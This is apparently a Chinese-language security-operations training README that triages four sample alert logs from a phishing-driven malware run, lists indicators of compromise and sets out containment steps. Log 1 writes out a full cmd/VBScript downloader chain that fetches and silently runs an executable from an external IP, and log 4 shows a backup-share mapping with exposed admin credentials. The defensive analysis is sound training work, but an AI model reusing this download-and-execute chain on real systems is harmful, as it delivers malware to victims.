GustavoDLadeia/LOG-ANALYSIS-malware-execution

## 通过网络钓鱼执行恶意软件（勒索软件或加载程序） 在这个仓库中，我提供了一个关于告警日志分析的简单示例。目的是展示我在观察到日志后是如何进行解读的。当然，对于被归类为高危或严重级别的告警，在升级给 N2 之前应该进行更深入的分析（因为我们在这里讨论的是由 N1 分析师执行的初始分诊）。这里的重点是首先阅读并解读日志所展示的情景。 ## 告警日志 ### 日志 1 ``` 2026-06-13T14:10:02.105Z | Image: C:\Windows\System32\cmd.exe | ParentImage: C:\Windows\explorer.exe | ParentCommandLine: C:\Windows\explorer.exe | CommandLine: cmd.exe /c "echo SET x=CreateObject("Microsoft.XMLHTTP") > c.vbs & echo x.Open "GET", "http://91.240.118.12/files/invoice.pdf.exe", False >> c.vbs & echo x.Send >> c.vbs & echo SET s=CreateObject("Adodb.Stream") >> c.vbs & echo s.Type=1 >> c.vbs & echo s.Open >> c.vbs & echo s.Write x.ResponseBody >> c.vbs & echo s.SaveToFile "C:\Users\Public\invoice.exe", 2 >> c.vbs & wscript.exe c.vbs" | User: CONTOSO\j.silva ``` ### 日志 2 ``` 2026-06-13T14:10:05.420Z | SourceAddress: 10.0.20.15 | SourcePort: 51234 | DestinationAddress: 91.240.118.12 | DestinationPort: 80 | Protocol: 6 | Application: \device\harddiskvolume3\windows\system32\wscript.exe ``` ### 日志 3 ``` 2026-06-13T14:10:08.885Z | Image: C:\Users\Public\invoice.exe | ParentImage: C:\Windows\System32\wscript.exe | CommandLine: C:\Users\Public\invoice.exe --mode=silent | User: CONTOSO\j.silva ``` ### 日志 4 ``` 2026-06-13T14:11:15.310Z | Image: C:\Windows\System32\net.exe | ParentImage: C:\Users\Public\invoice.exe | CommandLine: net use Z: \\10.0.50.10\Backup_Share /user:CONTOSO\admin_adm P@ssw0rd123! | User: CONTOSO\j.silva ``` ## 分析 ### 诊断结果（攻击情景） 这里发生的是一次带有恶意软件执行（可能是勒索软件或 Loader）的网络钓鱼攻击，并导致了横向移动/持久化尝试。 #### 起源（日志 1） 用户 j.silva 收到了一封网络钓鱼电子邮件或下载了一个恶意文件。由于 ParentImage 是 explorer.exe（Windows 图形界面），这意味着用户双击了一个文件。 #### 欺骗手段（日志 1 和 2） 那次点击启动了 cmd.exe，并在服务器上创建了一个 Visual Basic 脚本（c.vbs）。该脚本使用 wscript.exe 连接到互联网（IP 91.240.118.12）并下载了伪装的恶意二进制文件：invoice.pdf.exe（使用双重扩展名来欺骗用户，使其误认为这是一个合法的 PDF）。 #### 执行（日志 3） 该脚本从一个公共文件夹（C:\Users\Public）静默执行了（--mode=silent）invoice.exe 二进制文件，这是一种用于规避常规用户目录权限过滤的常见技术。 #### 横向移动（日志 4） 在用户上下文中运行的恶意软件尝试映射备份共享（\\10.0.50.10\Backup_Share）。它还注入了显式的管理员凭据（CONTOSO\admin_adm 和密码 P@ssw0rd123!）。攻击者可能事先窃取了此密码，或者该密码被硬编码在恶意软件中。基于这些行为，我们可以推断出可能的企图：在锁定主服务器之前破坏或加密备份。 ### 入侵指标 #### 恶意 IP（C2 / 命令与控制） - 91.240.118.12（端口 80） #### 创建的文件 / 痕迹 - C:\Users\Public\invoice.exe #### 临时本地脚本 - c.vbs（可能位于执行命令的当前目录中） #### 可疑的 URL/路径 - http://91.240.118.12/files/invoice.pdf.exe #### 受损账户 - CONTOSO\j.silva（受感染的源机器） - CONTOSO\admin_adm（在日志中暴露的凭据） ### 立即遏制措施 #### 主机网络隔离 立即通过 EDR 将服务器与网络隔离。这可以防止恶意软件继续传播或连接到备份服务器（10.0.50.10）。 #### 账户锁定与重置 请求立即重置密码，并撤销用户 j.silva 以及至关重要的 admin_adm 的所有活动会话。 #### 边界阻断 将 IP 91.240.118.12 添加到防火墙和企业代理的黑名单中。 #### 终止进程/收集痕迹 使用 EDR 控制台，终止 invoice.exe 进程（如果它仍在运行）并收集该文件以进行沙箱分析。 ## 附加内容 重要的是要记住，这是一个具有无限可能性的场景。必须了解 Windows、Linux 和 MacOS 等操作系统的合法进程、它们的功能、实用工具，以及攻击者如何利用它们来实施攻击。没有哪两次攻击的发生方式是完全相同的；为了检测异常活动，有必要了解系统的正常行为。

标签：OpenCanary, 安全运营, 扫描框架, 网络信息收集, 蓝军, 防御加固